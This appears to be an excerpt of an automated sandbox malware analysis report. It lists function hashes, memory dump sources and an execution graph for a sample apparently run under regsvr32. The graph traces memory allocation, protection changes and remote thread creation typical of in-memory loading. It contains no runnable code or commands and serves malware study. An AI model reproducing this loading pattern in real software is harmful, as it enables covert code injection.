                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20e0fa1cddfcb9b50fa612d7809b1235543b267f8bf6d467ddf7fa8b8e985724
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1441A533A08B5285E725DF21E4502BD7395EF4A780B54A135EA4E87B85EF3ED482D306
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69750ab0ff52fada28ebfa92186e91d4bd3c806beb7ccc09d2e7b54c4280536a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41C323B18A4182DB20CF65E8443AA77A1FB89B84F909035EE4DC7798EF7DD402DB45
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab9fd17095cc13701cfb0daaa58d5b6901f9a6a28f880bc0456c606be9a7d1bf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 203f8410dc24054cfdff1f726effb8b637568c94dd75750a861f8d207dafecaa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab9fd17095cc13701cfb0daaa58d5b6901f9a6a28f880bc0456c606be9a7d1bf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25210473A0828182EB209B25D04437D73B2FB89B44F459035DA8DC7684FF7EE986D786
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: Error detected
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c6b4675d3aaafff6775c2fcfc2f8122bb06e8d64fd6469e4fcebd850c6bebc76
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21F77362868292EB20CB10F4907EAB364FF85788F802135E68D87A55DF7DD316DB05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: Fatal error detected
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 583469322d8260f26d153e8829367d3b9b5b501394990ae2de7418aa34a5c6a4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D21F77362868192EB20CB20F4507EAB364FF85788F802035E68D87A65DF7DD356DB05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 28b7bfeea7e9c700ac1b5f6795a936ddb4e923aa9907f82a424455fe06176dd5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89118F33A08B8182EB108F25F4043A9B7A1FB89B84F185234DF8C47764DF7ED5529B05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 41e85917b90d608706e955969af223dd9cc8b853e4558c09e479d17d668df7af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E01D46391C20286FB209F6094623BE33A0EF8A744F406039D58DC7691EF3ED546EA0E
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:31%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:50
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                                                                                                                  execution_graph 1437 2df1f6e 1438 2df1f83 1437->1438 1443 2df1039 VirtualAlloc 1438->1443 1440 2df1fa6 1445 2df1889 VirtualProtect 1440->1445 1444 2df10c8 1443->1444 1444->1440 1446 2df1909 1445->1446 1447 2df1942 VirtualProtect 1446->1447 1448 2df1988 1447->1448 1449 2df19c4 1450 2df1a8e VirtualProtect 1449->1450 1451 2df1a3b 1449->1451 1450->1451 1451->1449 1452 2df1b84 1451->1452 1453 4eb2b64 1457 4eb2bbf 1453->1457 1454 4eb3203 1455 4eb2ffd VirtualAlloc 1455->1457 1456 4eb2eb9 VirtualProtect 1456->1457 1457->1454 1457->1455 1457->1456 1458 4eb2eff VirtualProtect 1457->1458 1459 4eb2f43 VirtualProtect 1457->1459 1461 4ff1e60 1457->1461 1458->1457 1459->1457 1462 4ff1e9e 1461->1462 1463 4ff23f0 1462->1463 1465 4ff2f20 1462->1465 1463->1457 1466 4ff2f8d 1465->1466 1466->1466 1467 4ff585e 1466->1467 1470 4ff66c0 1466->1470 1474 4ff6370 1466->1474 1467->1462 1473 4ff675e 1470->1473 1471 4ff6983 1471->1466 1472 4ff680d VirtualAlloc 1472->1473 1473->1471 1473->1472 1475 4ff6411 1474->1475 1476 4ff6488 VirtualFree 1475->1476 1477 4ff6666 1475->1477 1476->1475 1477->1466 1478 4ff16e0 1480 4ff177c 1478->1480 1479 4ff19f1 1480->1479 1481 4ff194f NtCreateThreadEx 1480->1481 1481->1480 1482 4ff1ad0 1484 4ff1b81 1482->1484 1483 4ff1e44 1484->1483 1485 4ff1da3 MapViewOfFile 1484->1485 1485->1484 1486 4ff69c0 1487 4ff6a37 1486->1487 1487->1487 1488 4ff6aa4 FindCloseChangeNotification 1487->1488 1489 4ff6bfd 1487->1489 1488->1487 1490 4ff5c80 1493 4ff5d31 1490->1493 1491 4ff5f3a 1492 4ff5dce CreateFileMappingW 1492->1493 1493->1491 1493->1492

                                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_02DF1FDC 1 Function_04FF5879 2 Function_04EB416C 2->2 72 Function_04EB25B4 2->72 86 Function_04EB3295 2->86 3 Function_02DF30D6 4 Function_02DF1FD5 5 Function_02DF1755 6 Function_04EB2B64 6->2 7 Function_04EB23E4 6->7 13 Function_04EB15F0 6->13 19 Function_04FF1E60 6->19 27 Function_04EB2A4C 6->27 76 Function_04EB5788 6->76 8 Function_04FF6370 9 Function_04FF2870 10 Function_04FF5870 11 Function_04EB23FE 12 Function_02DF14C5 30 Function_04EB2440 13->30 66 Function_04EB5338 13->66 14 Function_02DF19C4 14->12 15 Function_02DF1543 16 Function_02DF25C2 25 Function_02DF1FFB 16->25 78 Function_02DF1637 16->78 17 Function_04EB23F5 18 Function_02DF17C0 74 Function_04FF2F20 19->74 20 Function_04FF16E0 58 Function_04FF1AB4 20->58 21 Function_02DF187F 22 Function_02DF407F 23 Function_02DF1BFD 23->12 24 Function_04FF5C5C 26 Function_02DF22FA 26->25 26->78 28 Function_02DF2278 29 Function_02DF1477 30->66 31 Function_04EB4140 32 Function_02DF1DF3 33 Function_02DF15F2 34 Function_02DF1BF2 35 Function_02DF1E71 35->28 36 Function_04FF1AD0 37 Function_04FF58D0 38 Function_04FF5F50 39 Function_04FF6C50 40 Function_04FF5C50 41 Function_02DF1F6E 41->18 41->32 59 Function_02DF1413 41->59 67 Function_02DF1889 41->67 77 Function_02DF1039 41->77 42 Function_02DF1C6E 43 Function_04EB23D8 44 Function_02DF11E9 45 Function_02DF1C67 46 Function_04EB15D0 47 Function_02DF1764 48 Function_04FF66C0 49 Function_04FF69C0 49->9 50 Function_04FF16C0 51 Function_04FF2B40 52 Function_02DF1819 53 Function_02DF2719 54 Function_04EB242C 55 Function_04EB55AC 56 Function_02DF1516 57 Function_04EB21A0 60 Function_02DF2791 61 Function_04FF2AB0 62 Function_04FF6FB0 63 Function_04FF1AB0 64 Function_02DF118F 65 Function_02DF400F 67->12 67->28 68 Function_02DF4007 69 Function_02DF1485 70 Function_02DF1785 70->78 71 Function_02DF4005 73 Function_02DF1000 74->8 74->48 75 Function_04FF13A0 77->12 77->25 77->35 77->64 78->42 79 Function_02DF1736 80 Function_02DF26B6 81 Function_04FF1A10 82 Function_04EB2198 83 Function_02DF15A6 84 Function_04FF6304 85 Function_02DF14A3 85->32 86->55 86->57 87 Function_04FF5C80 88 Function_04FF2880 88->24 88->50 88->84 89 Function_04FF1000 90 Function_04FF6300

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB2EDD
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB2F19
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,00000000,00000000), ref: 04EB2F67
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000FF,00000000,000000FF,00000000,00000000), ref: 04EB301C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088012657.0000000004EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04EB1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4eb1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97caece86f976bfbf2a3e2be09a3e89c7ddb445153c299266a497b5833cc0485
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7de99c0ceaa1073fa558be9bc4f67547996e6af19b1be1d7e505a121c324a4f7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97caece86f976bfbf2a3e2be09a3e89c7ddb445153c299266a497b5833cc0485
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA12A472A083418FD764CF69C88179BB7E2BFC8310F158A6DE899DB345DA74E845CB81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 60 4ff16e0-4ff177a 61 4ff177c-4ff17b5 60->61 62 4ff17b7-4ff17cc 60->62 61->61 61->62 63 4ff17d2-4ff17f2 62->63 64 4ff19f1-4ff1a01 62->64 65 4ff17f6-4ff1800 63->65 66 4ff18aa-4ff18b4 65->66 67 4ff1806-4ff18a5 65->67 68 4ff18ba-4ff18c4 66->68 69 4ff19d1-4ff19e7 66->69 71 4ff19e9-4ff19eb 67->71 72 4ff18ca-4ff18d4 68->72 73 4ff19b7-4ff19cf 68->73 69->71 71->64 71->65 74 4ff18d6-4ff1931 call 4ff1ab4 72->74 75 4ff1933-4ff193d 72->75 73->71 81 4ff19a6-4ff19ab 74->81 77 4ff193f-4ff1949 75->77 78 4ff19ad-4ff19b5 75->78 77->71 80 4ff194f-4ff19a2 NtCreateThreadEx 77->80 78->71 80->81 81->71
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04FF1996
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2422867632-3081909835
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7eb4c0d0180bac31bb43bd56346196c065ee0826d27ae13e647fc7bde5b70e7d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 087e57660cdf20786cb7df20f679c4f83f80456b9d9d6e347f160d3b67715f71
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eb4c0d0180bac31bb43bd56346196c065ee0826d27ae13e647fc7bde5b70e7d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B917B77A182518FD310CE29CD8165BB7E2AFC8710F1A8A2DE998D7354D734EC02CB92
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
